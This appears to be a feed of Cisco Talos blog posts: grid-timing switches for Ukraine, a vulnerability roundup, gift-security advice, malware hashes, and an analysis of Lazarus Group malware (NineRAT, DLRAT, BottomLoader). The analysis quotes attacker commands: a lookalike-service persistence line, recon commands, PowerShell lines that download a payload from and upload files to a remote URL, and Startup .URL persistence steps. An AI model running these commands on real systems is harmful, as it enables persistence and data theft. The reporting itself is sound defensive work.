GPS solves this challenge. Devices can use the GPS satellites’ time signal to determine how accurate its local time reference is and then adjust the time accordingly, thereby enabling all devices running GPS-enabled clocks to be aligned to the exact same time. 

Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

These GPS time signals are crucial for making a key piece of power equipment called a phasor measurement unit (PMU) run effectively. PMUs are used in power systems around the world to augment operators’ visibility into what is happening throughout a vast power grids network. A PMU measures a quantity called a phasor, which is the magnitude and phase angle of a voltage or current at a specific location on a power line.  

PMUs are essential to providing a detailed and accurate view of power quality across a wide geographic grid. Data from PMUs allows operators to predict and detect stress and stability on the grid, identify inefficiencies, and provide information for event analysis after a disturbance occurs. 

PMU data is time-stamped — to the precision of a microsecond — using the timing signal from GPS satellites. Therefore, measurements taken by PMUs in different locations are accurately synchronized with each other and time-aligned using the same global time reference marker. This allows all PMU data to be combined to provide precise and comprehensive information about an entire power grid. 

When GPS clocks are unavailable and the corresponding time signal has an error, that error can cause false calculations of phase angle and mis-alignment of grid conditions relative to other PMUs. Without the ability to analyze the precise timing of an electrical anomaly as it propagates through a grid, grid operators have difficulty diagnosing the exact issue that requires correction. Relatedly, if GPS timing is down, grid operators will have increased difficulty balancing power during the adverse events that occur during wartime.

Chapter 4: "You don't need atomic clocks"

After that fateful dinner with Ukrenergo, I spent the next few nights in deep thought. My brain wouldn’t let go of this timing issue. I consulted with colleagues and experts from other organizations who specialize in electric grid security, and ironically, they all suggested the same thing – atomic clocks. 

I knocked on Talos Vice President Matt Watchinksi’s door. I explained the situation to him, and ended by saying, “So can Cisco make an atomic clock?” I’d got it into my head that the only possible solution was to create a version of an atomic clock, as their holdover is measured in nanoseconds of accuracy. More than enough accuracy for a power grid.

Matt responded by saying he had no idea, but he would make some phone calls. That led me to a meeting with our Cisco Internet of Things (IoT) division. I asked them the same question I asked Matt: “Can Cisco make an atomic clock to counteract the GPS jamming, like what is being reported in Ukraine? 

After some research and identifying all manners of issues with locating an atomic clock, the team said, “Actually. We don’t think you need one. We think we have an existing solution within our IoT networking equipment. We can use that to build something unique for this specific situation.”

As is the case with most things in life, you should put your faith in the experts. And I’m so glad I listened to the IoT team. Because that was how we turned the ship, and Project PowerUp was a go.

Together with Cisco’s IOT networking team, we were going to design, create and deliver custom devices to Ukraine to keep substations running and delivering power to the entire country. 

“Throughout this war, I’ve seen and heard how resilient Ukrainians are. It’s very true. Citizens are dealing with one awful situation after the other, to the extent that this mentality of everyday trauma has become normalized. However, ‘getting used’ to power outages and not being able to keep warm in the Winter shouldn’t be normal. That’s what this whole project is about.”  Eric Wenger, senior director of technology policy for Cisco Government Affairs

Chapter 5: Is it good enough?

I mentioned earlier that this initiative was guided by the principle that speed was key. Delays meant potentially disastrous consequences. But I soon came to add another principle: Perfection is the enemy of good enough. 

The IoT team’s suggestion was that a Cisco Industrial Ethernet switch would be the best starting point in identifying a potential solution to the issues caused by Ukraine’s GPS outages. Industrial Ethernet switches do not have atomic clocks for holdover accuracy – but they have a good enough clock, able to measure time accurately in microseconds, to sustain an accurate time sync. This is important – Ukraine's electric grids operate on a 50hz frequency and have timing needs in microseconds.  

An Industrial Ethernet switch is part of Cisco’s hardened suite of switches, routers and other products designed specifically for rugged deployment, and Ukraine’s warzone undoubtedly fits into that category. These devices are built to withstand harsh industrial environments and extreme temperature ranges (-40° to 75°C). 

Hardened switches also have various internal resiliency features, including a source for its internal clock. Most network hardware devices use an internal crystal oscillator to generate their clock time, but these crystals’ frequencies can oscillate widely based on local conditions. However, an Industrial Ethernet switch can avoid this problem, as its crystal is a superior and resilient design, providing better frequency stability for precise synchronization of features such as GPS reception. 

Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

Despite an Industrial Ethernet switch’s advantages, we needed to make some software modifications that would enable the device to address the specific set of challenges facing Ukraine’s power grid. 

Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

There were two core issues we had to address with the Industrial Ethernet switch that required us to make enhancements to the device. First, we had to ensure interoperability between an Industrial Ethernet switch and the PMUs, and second, an Industrial Ethernet switch needed to provide the necessary holdover during GPS outages for the PMUs to continue working. Holdover is the time period to keep the clocks in sync until timing signals can be restored. 

During Ukraine’s GPS outages, which can last several hours, the PMUs effectively declare that something is wrong and stop sending data to the broader power management infrastructure — which causes significant upstream effects. Our first goal was to find a way to keep the PMU transmitting data. By modifying the metadata that an Industrial Ethernet switch sends to the PMUs, the PMUs will continue operating and sending data even without that signal. 

Next, we had to enable the Industrial Ethernet switch to provide an accurate time to the PMUs when time was unavailable (aka, the “holdover” period). We modified the Industrial Ethernet switch’s code to provide trusted time. 

With an Industrial Ethernet switch deployed to Ukraine’s substations, it measures the difference between the PMU’s local time reference used by the PMU and GPS time while GPS is still active. Then, when GPS signal is lost, the PMU can revert to using the local time reference, which is now highly accurate from the earlier error measurements, thereby allowing the PMU to continue operating.   

To ensure that an Industrial Ethernet switch fully understands what the GPS signal is telling it before the signal shuts down, Cisco created new, enhanced clock recovery algorithms. We also applied some additional filtering to the device’s software to allow it to recognize that the signal is down and to provide a “best guess” of what the time was when GPS was lost. 

We now had a device that was ready for production, but the job wasn’t done until testing was completed. After successful testing, Cisco immediately prioritized production of these devices. Hardware and software engineers from across the company pooled their collective expertise and created a production line capable of supporting the unique needs of Ukraine.

Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare
Our switches in Ukraine! 

From the very start of Project PowerUp all I kept thinking about was the big picture of what we were trying to achieve. I’m proud to say that Cisco did this in an incredibly fast timeline. It is no easy feat to re-prioritize production efforts, especially in a technology company as vast as Cisco. But we had that guiding principle of speed and urgency – the longer this took for us to get these devices into Ukraine, the more days Ukrainians would be threatened with grid instability. 

A special shoutout to our Cisco Critical Accounts team. This team has been relentless in helping get key deliveries to Ukraine since the start of the invasion, and they were able to help drive the urgency for Project PowerUp too.

Chapter 6: Closing thoughts

As I write this, our Industrial Ethernet switches are in Ukraine, and helping keep the lights on. This reminds me of what we do at Talos every day. We fight the good fight every day to protect others.  

It is a lamentable fact that in cybersecurity and in critical infrastructure protection, we’re often confronted with the fact that our work, while valuable, may never be realized in our lifetimes as professionals. It is the legacy we leave with others we help protect and is built upon a large community who believe in fighting that good fight for generations to come. 

Project PowerUp is a little different. We know, beyond a doubt, that our work there will help save lives and will help keep the lights on. The effects are incredibly difficult to calculate, but we know it’s going to make life better. It’s helping others stay out of harm’s way. It’s helping a hospital that may not have reliable backup power. It’s giving a child just five more minutes of their childhood watching cartoons. 

If anything can be taken away from this, it’s that acting and leading with empathy is core to our mission at Talos. This year we took a chance to make a tangible difference in the lives of others and help them have a better life. Fighting the good fight isn’t just about cybersecurity – it’s about doing the right thing and helping others in the face of adversity. 

What started as a chance presentation this year turned into a multi-national, multi-company global team of power grid security practitioners who had never worked together before. As a team, we overcame numerous challenges to make Project PowerUp work. We could not have been successful without the support of numerous experts in Cisco who helped innovate this novel solution. And, of course, we must thank our partners in Ukraine, the U.S. government, and ICS vendors and experts who lent us their time, empathy, and expertise. We are humble and grateful for their help.

Slava Ukraini! 

The malware, attacker trends and more that shaped the threat landscape in 2023

5 December 2023 at 23:25
The malware, attacker trends and more that shaped the threat landscape in 2023

The 2023 Cisco Talos Year in Review is now available to download. 

Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out.

The malware, attacker trends and more that shaped the threat landscape in 2023

Read the 2023 Cisco Talos Year in Review

Download Now

At the beginning of the Year in Review is a “Top Trends” section comprised of regional trends over time and the influence of geopolitical events, the CVEs attackers exploited most often, spam tactics, and the top MITRE ATT&CK techniques that have been used within attacks.  The report then deep dives on four topics:  

The evolution of ransomware and extortion. The concerning rate of attacks against network infrastructure devices. The activities of advanced persistent threat (APT) actors in China, Russia, and the Middle East. This section also includes the major threats our Ukraine Task Unit dealt with this year. The shifting activities and impact of commodity loaders. 

Cisco’s global presence and Talos’ world-class expertise provided a massive amount of data to research — endpoint detections, incident response engagements, network traffic, email corpus, sandboxes, honeypots and much more. Thankfully, our teammates include subject matter experts from all ends of the cybersecurity space to help us turn this intelligence into actionable information for defenders and users.  

So, what is the main story of the 2023 Year in Review? Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.  

Download the Cisco Talos Year in Review today, and please share it with your colleagues and communities. This report was written by defenders, for defenders, and we hope it proves a useful and insightful resource for you. 

For more Year in Review content, visit the 2023 Year in Review landing page.

Beers with Talos episode 141: The TurkeyLurkey Man wants YOU to read Talos' Year in Review report

6 December 2023 at 10:41
Beers with Talos episode 141: The TurkeyLurkey Man wants YOU to read Talos' Year in Review report

In this episode the Beers with Talos team, led by special guest Dave Liebenberg, set out to save Thanksgiving. The TurkeyLurkey man is the hero that everybody needs, but perhaps don't deserve.

For fans and opposers of Dave's Ranksgiving list, you'll be pleased to know he's back with a whole new order, and some new snackable entrants.

Oh, and if it's security content you're after, we have some! Our 2023 Year in Review is out now, and the team recaps the top malware and attacker trends from the year. We also discussed the recent CNN article and Talos blog on our work to protect Ukraine's power grid.

If you'd like to read more, download the full Talos Year in Review report here.

Subscribe to future episodes of Beers with Talos at your own peril here.

Remote code execution vulnerabilities found in Buildroot, Foxit PDF Reader

6 December 2023 at 18:33
Remote code execution vulnerabilities found in Buildroot, Foxit PDF Reader

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin. 

Attackers could exploit these vulnerabilities in the Foxit PDF Reader to carry out a variety of malicious actions, but most notably could gain the ability to execute arbitrary code on the targeted machine. Foxit aims to have feature parity with Adobe Acrobat Reader, the most popular PDF-reading software currently on the market. The company offers paid versions of its software for a variety of users, including individuals and enterprises. There are also browser plugins of Foxit that run in a variety of web browsers, including Google Chrome and Mozilla Firefox. 

Talos’ Vulnerability Research team also found an integer overflow vulnerability in the GPSd daemon, which is triggered if an attacker sends a specially crafted packet, causing the daemon to crash. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Multiple vulnerabilities in Foxit PDF Reader 

Discovered by Kamlapati Choubey. 

Foxit PDF Reader contains multiple vulnerabilities that could lead to remote code execution if exploited correctly.  

TALOS-2023-1837 (CVE-2023-32616) and TALOS-2023-1839 (CVE-2023-38573) can be exploited if an attacker embeds malicious JavaScript into a PDF, and the targeted user opens that PDF in Foxit. These vulnerabilities can trigger the use of a previously freed object, which can lead to memory corruption and arbitrary code execution.  

TALOS-2023-1838 (CVE-2023-41257) works in the same way, but in this case, it is caused by a type confusion vulnerability.  

Three other vulnerabilities could allow an attacker to create arbitrary HTA files in the context application, and eventually gain the ability to execute arbitrary code on the targeted machine. TALOS-2023-1832 (CVE-2023-39542), TALOS-2023-1833 (CVE-2023-40194) and TALOS-2023-1834 (CVE-2023-35985) are all triggered if the targeted user opens a specially crafted file in the Foxit software or browser plugin. 

GPSd NTRIP Stream Parsing access violation vulnerability 

Discovered by Dimitrios Tatsis. 

An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPS daemon, which is used to collect and display GPS information in other software. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger TALOS-2023-1860 (CVE-2023-43628). 

According to GPSd’s website, this service daemon powers the map service on Android mobile devices and is “ubiquitous in drones, robot submarines, and driverless cars.” 

Buildroot - embedded Linux systems builder tool 

Discovered by Claudio Bozzato and Francesco Benvenuto. 

Talos researchers recently found multiple data integrity vulnerabilities in Buildroot, a tool that automates builds of Linux environments for embedded systems. 

An adversary could carry out a man-in-the-middle attack to exploit TALOS-2023-1845 (CVE-2023-43608) and TALOS-2023-1844 (CVE-2023-45842, CVE-2023-45839, CVE-2023-45838, CVE-2023-45840 and CVE-2023-45841) to execute arbitrary code in the builder. 

As a direct consequence, an attacker could then also tamper with any file generated for Buildroot’s targets and hosts. 

Malformed Excel file could lead to arbitrary code execution in WPS Office 

Discovered by Marcin “Icewall” Noga. 

An uninitialized pointer use vulnerability (TALOS-2023-1748/CVE-2023-31275) exists in the functionality of WPS Office, a suite of software for word and data processing, that handles Data elements in an Excel file.  

A specially crafted malformed Excel file can lead to remote code execution. 

WPS Office, previously known as a Kingsoft Office, is a software suite for Microsoft Windows, macOS, Linux, iOS, Android, and HarmonyOS developed by Chinese software developer Kingsoft. It is installed by default on Amazon Fire tablet devices. 

Talos disclosed this vulnerability in November despite no official fix or patch from Kingsoft after the company did not respond to our notification attempts and failed the 90-day deadline as outlined in Cisco’s third-party vendor vulnerability disclosure policy.  

Cybersecurity considerations to have when shopping for holiday gifts

7 December 2023 at 19:00
Cybersecurity considerations to have when shopping for holiday gifts

As I wrote about last week, there are holiday shopping-related scams already popping up all over the place.  

But another aspect of security that many shoppers don’t consider this time of year is the security of the products they’re buying, even through a legitimate online marketplace. 

This is a glaring issue with home security cameras and Wi-Fi-connected doorbells, but I can’t imagine these are particularly popular holiday gifts. With virtually everything being connected to the internet somehow these days, everything is a potential security risk if you’re buying a new piece of technology. 

Take smartwatches, for example. Apple Watches and Samsung Galaxy watches are always popular on everyone’s wishlists this time of year because they’re high-priced items you normally wouldn’t buy for yourself. Many shoppers might be looking for a deal this time of year and not looking to spend hundreds on the gift, so any sort of cheaper alternative could be appealing. 

I searched for “smart watches” on Amazon, and the results page displayed four different watches from four different vendors as their “Top Results,” none of which were Samsung and Apple. Well-known vendors are certainly not immune to security issues or vulnerabilities, but at least users can be confident that any known vulnerabilities will be disclosed and patched by these companies as they pop up. 

Cybersecurity considerations to have when shopping for holiday gifts

The top result is for a $29.99 smartwatch that offers sleep tracking, blood pressure monitoring, dozens of different workout modes, step tracking, and more. However, there are a few security flags for me right up front with this deal (after all, if it seems too good to be true, it probably is). Amazon states the seller is a company called “Nerunsa,” but a quick search did not turn up any legitimate information on who this company is, where they’re based, or the sort of security bona fides you’d be hoping for. The only search results are for the company’s Amazon store page and a few eBay listings for people reselling the watch in question. 

The app that’s listed as supporting the watch is called “GloryFit” on the Google Play and Apple app stores, and its privacy policy is equally vague. It states that the app will collect all the suspected information for someone using a smartwatch — phone calls, text messages, GPS location, personal information, health information, etc. But, the policy states that, when the user accepts the privacy policy, “You hereby consent to our process and disclose personal information to our affiliated companies (which are in the communications, social media, technology and cloud businesses) and to Third Party Service Providers for the purposes of this Privacy Policy.” And it’s not particularly clear what those other companies do, exactly — Google was no help here, either. 

Apple Air Tags are also another popular tech gift every year and are usually featured in major retailers’ Black Friday sales. I personally have my own concerns about any type of tracking tag coming into my house, but that’s for another column. 

On Walmart, which is increasingly trying to compete with Amazon by offering more products online, I searched for “smart tag” and found three results that appeared ahead of Apple’s legitimate Air Tags. The second-most-popular result is for a “Bluetooth Tracker and Item Locator” that’s only $15.98, compared to $86.88 for a four-pack of Apple’s. This tracker is listed as being made by “AILIUTOP,” which also remains elusive on the internet and does not seem to have any sort of legitimate contact information available to the public. Their store page on Walmart indicates the seller offers many types of products, from clothing to home goods and more.  

Cybersecurity considerations to have when shopping for holiday gifts

 This seems like a good bargain as a gift for someone who is always losing their keys or wallet or wants to make sure their bicycle is secure when they lock it up somewhere. But purchasing these types of “smart” devices with so much uncertainty poses a few issues. 

If you do experience some sort of security failure or issue, there is no easy way to contact any of these vendors through the traditional means that the average user would go searching for. These vendors have no clear history of responsibly disclosing vulnerabilities, releasing security updates, or testing their products’ security before release. 

When these types of gifts are dealing with such high-profile information like your personal information, health data, or physical location, users should be confident that their information is being stored correctly and securely, or at least there’s a way to contact the vendor should they have any questions. 

When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up, read their app’s privacy policy, or even read the reviews to make sure there’s no clear sign of bot activity like repetitive words or phrases or using the same photo for multiple reviews.  

The one big thing 

The 2023 Cisco Talos Year in Review is now available to download. Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out. 

Why do I care? 

The Year in Review report includes new data and telemetry from Talos about attacker trends, popular malware seen in the wild, and much more. Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, our report shows that the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.   

So now what? 

Download our full report here, bookmark the Year in Review landing page for future content we have planned around the report, and listen to the Beers with Talos episode that covers the details of the report. 

Top security headlines of the week 

More than six million people are reportedly victims of a large data breach at DNA and genealogy testing firm 23andMe. The breach is larger than initially expected, with more than 5.5 million users who opted into the company’s “DNA Relatives” feature, which allows customers to automatically share some of their data with other users. Another 1 million-plus users had their family tree information accessed. The attackers accessed the accounts because of password reuse from users, likely who used easy-to-guess login information or passwords they used across multiple other accounts. 23andMe was not the target of the initial breach, nor was a company account the source of the compromised credentials. Security experts are urging users to move away from traditional username-and-password login methods as these types of attacks happen more often, instead moving toward multi-factor authentication or passwordless logins. (TechCrunch, Wall Street Journal

Apple released emergency fixes for two zero-day vulnerabilities in its WebKit browser engine that have already been exploited in the wild. The company reported that the flaws are being exploited on devices running on iOS versions before iOS 16.7.1 (released on Oct. 10, 2023). There are new patches available, which users should install immediately, in iOS, iPadOS, macOS Sonoma and the Safari web browser. The two vulnerabilities tracked as CVE-2023-42916 and CVE-2023-42917, leave affected devices vulnerable to adversaries accessing sensitive information on targeted devices. CVE-2023-42917 could also allow an attacker to execute arbitrary code on the targeted machine. (SC Magazine, Decipher

Security researchers say a new threat actor known as “AeroBlade” compromised a U.S. aerospace company for more than a year. The actor reportedly started testing their malware and infection chain on the targeted network in September 2022 and executed malware on the network in July 2023. The activity sat undetected for months due to anti-analysis techniques. It is currently unknown what actions, if any, the actor carried out during that time or if they compromised any user or customer data. The initial infection began with a Microsoft Word lure document with the title, “"SOMETHING WENT WRONG Enable Content to load the document." The ensuing malicious Microsoft Word template (DOTM) file then loaded a DLL that served as a reverse shell. Researchers say the attacker’s intent was likely to steal data from the target to sell it, potentially supply it to international competitors, or use it to extort the target into paying a ransom. (Dark Reading, Bleeping Computer)  

Can’t get enough Talos? 

Security journalists from Decipher bring you the headlines, including new U.S. government sanctions on threat actor groups in our latest Threat Spotlight video.

Then, Hazel chats to Talos security researcher Joe Marshall to discuss the Talos 2023 Year in Review, and Project PowerUp, the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to help “keep the lights on” in Ukraine, by injecting a measure of stability in Ukraine’s power transmission grid.

Upcoming events where you can find Talos 

"Power of the Platform” by Cisco (Dec. 5 & 7) 

Virtual (Please note: This presentation will only be given in German) 

The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you.  

What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead (Dec. 13, 11 a.m. PT) 

Virtual 

Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them. 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a 
MD5: 200206279107f4a2bb1832e3fcd7d64c 
Typical Filename: lsgkozfm.bat 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::tpd 

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440 
MD5: ef6ff172bf3e480f1d633a6c53f7a35e 
Typical Filename: iizbpyilb.bat 
Claimed Product: N/A  
Detection Name: Trojan.Agent.DDOH 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd 

SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7  
MD5: 0e4c49327e3be816022a233f844a5731  
Typical Filename: aact.exe  
Claimed Product: AAct x86  
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: streamer.exe 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

Video: Talos 2023 Year in Review highlights

11 December 2023 at 10:48
Video: Talos 2023 Year in Review highlights

In this video, experts from across Cisco Talos came together to discuss the 2023 Talos Year in Review. We chat about what’s new, what’s stayed the same, and how the geopolitical environment has affected the threat landscape.

This video was recorded live on social media:

Video: Talos 2023 Year in Review highlights

Read the 2023 Cisco Talos Year in Review

Download Now

We also discussed Project PowerUp, the story of how Cisco helped to keep the lights on in Ukraine. Read the full story here.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

11 December 2023 at 13:50
  • Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
  • Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.
  • Talos has observed an overlap between our findings in this campaign conducted by Lazarus including tactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx Sleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella. 
  • This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Lazarus Group’s, Operation Blacksmith compromised manufacturing, agriculture and physical security sectors

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel. We’re naming this malware family “NineRAT.” NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023, almost a year later, against a South American agricultural organization. We then saw NineRAT being used again around September 2023 against a European manufacturing entity. 

During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTIONIUM or Andariel. 

Talos agrees with other researchers’ assessment that the Lazarus APT is essentially an umbrella of sub-groups that support different objectives of North Korea in defense, politics, national security and research and development. Each sub-group operates its own campaigns and develops and deploys bespoke malware against their targets, not necessarily working in full coordination. Andariel is typically tasked with initial access, reconnaissance and establishing long-term access for espionage in support of North Korean government interests. In some cases, Andariel has also conducted ransomware attacks against healthcare organizations.

The current campaign, Operation Blacksmith, consists of similarities and overlaps in tooling and tactics observed in previous attacks conducted by the Andariel group within Lazarus.

A common artifact in this campaign was  “HazyLoad,” a custom-made proxy tool previously only seen in the Microsoft report. Talos found HazyLoad targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

In addition to Hazyload, we discovered “NineRAT” and two more distinct malware families — both DLang-based — being used by Lazarus. This includes a RAT family we’re calling “DLRAT” and a downloader we call “BottomLoader” meant to download additional payloads such as HazyLoad on an infected endpoint.

The adoption of DLang in Lazarus’ malware — NineRAT, DLRAT and BottomLoader

NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications.

NineRAT consists of three components, a dropper binary that contains two other components embedded in it. The dropper will write the two components on the disk and delete itself. The first component is an instrumentor, called nsIookup.exe ( capital ‘i’ instead of lower case L) that will execute the second component and will be used in the persistence mechanism. Modular infection chains such as these are frequently used by threat actors to achieve a multitude of objectives from defense evasion to functional separation of components that can be upgraded or modified while avoiding noisy operations on an infected system.

The dropper will set up persistence for the first component using a BAT script. The persistence mechanism accepts a service name, the path to the first component and service creation parameters:

Service Creation command

sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX

(Note the use of a capital “i” instead of “L” in nslookup[.]exe.)

The instrumentor binary contains a preconfigured path to the NineRAT malware which is used to execute the malware:

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Instrumentor binary (first component) containing the path to NineRAT malware on disk.

With NineRAT activated, the malware becomes the primary method of interaction with the infected host. However, previously deployed backdoor mechanisms, such as the reverse proxy tool HazyLoad, remain in place. The multiple tools give overlapping backdoor entries to the Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access. In previous intrusions such as the one disclosed by Talos in 2022, Lazarus relied heavily on the use of proxy tools as a means of continued access to issue commands and exfiltrate data.

The Telegram C2 channels used by the malware led to the discovery of a previously public Telegram bot “[at]StudyJ001Bot” that was leveraged by Lazarus in NineRAT. This Bot is publicly illustrated along with its ID and communication URL in a tutorial in Korean language from 2020. Using a publicly accessible bot may lead to infrastructure hijacking and likely having recognized that, Lazarus started using their own Bots for NineRAT. Interestingly, switching over to their own Telegram C2 channels, however, did not deter the use of older NineRAT samples using open channels. Anadriel has continued to use them well into 2023, even though they first started work on NineRAT in 2022. NineRAT typically consists of two API tokens for interacting with two different Telegram channels — one of these tokens is publicly listed.

NineRAT interacts with the Telegram channel using DLang-based libraries implemented to talk to Telegram’s APIs. Initially, the implant tests authentication using the getMe method. The implant can upload documents to Telegram using the sendDocument method/endpoint or download files via the getFile method. The malware can accept the following commands from their operator Telegram:

Command

Capability

/info

Gather preliminary information about the infected system.

/setmtoken

Set a token value.

/setbtoken

Set a new Bot token.

/setinterval

Set time interval between malware polls to the Telegram channel.

/setsleep

Set a time period for which the malware should sleep/lie dormant.

/upgrade

Upgrade to a new version of the implant.

/exit

Exit execution of the malware.

/uninstall

Uninstall self from the endpoint.

/sendfile

Send a file to the C2 server from the infected endpoint.

NineRAT can also uninstall itself from the system using a BAT file.

Below are some of the commands run by NineRAT for reconnaissance:

Command

Intent

whoami

System Information Discovery [T1082]

wmic os get osarchitecture

System Information Discovery [T1082]

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

Software Discovery [T1518]

Pivoting off the NineRAT samples, we discovered two additional malware families written in DLang by Lazarus. One of these is simply a downloader we track as “BottomLoader” meant to download and execute the next stage payload from a remote host such as HazyLoad:

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Strings and embedded payload URL in the DLang-based downloader, BottomLoader.

BottomLoader can download the next stage payload from a hardcoded remote URL via a PowerShell command:

powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>

It can also upload files to the C2, again using PowerShell:

powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)

BottomLoader can also create persistence for newer versions or completely new follow-up payloads by creating a “.URL” file in the Startup directory to run the PowerShell command to download the payload. The URL file is constructed using the following commands:

Command

echo [InternetShortcut] > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo URL="" >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconFile=C:\WINDOWS\system32\SHELL32.dll >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconIndex=20 >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

The other malware is a downloader and RAT, we track as “DLRAT,” which can be used to deploy additional malware and retrieve commands from the C2 and execute them on the infected endpoints:

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

DLRAT: A DLang-based RAT and downloader.

This malware contains hardcoded commands to perform system reconnaissance. It starts by executing the commands on the endpoint to gather preliminary information about the system: “ver”, “whoami” and “getmac”. With this, the operators will have information about the version of the operating system, which user is running the malware and MAC address that allows them to identify the system on the network.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
DLRAT code snippet consisting of preliminary data gathering capabilities.

Once the first initialization and beacon is performed, an initialization file is created, in the same directory, with the name “SynUnst.ini”.

After beaconing to the C2, the RAT will post, in a multipart format, the collected information and hardcoded session information.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

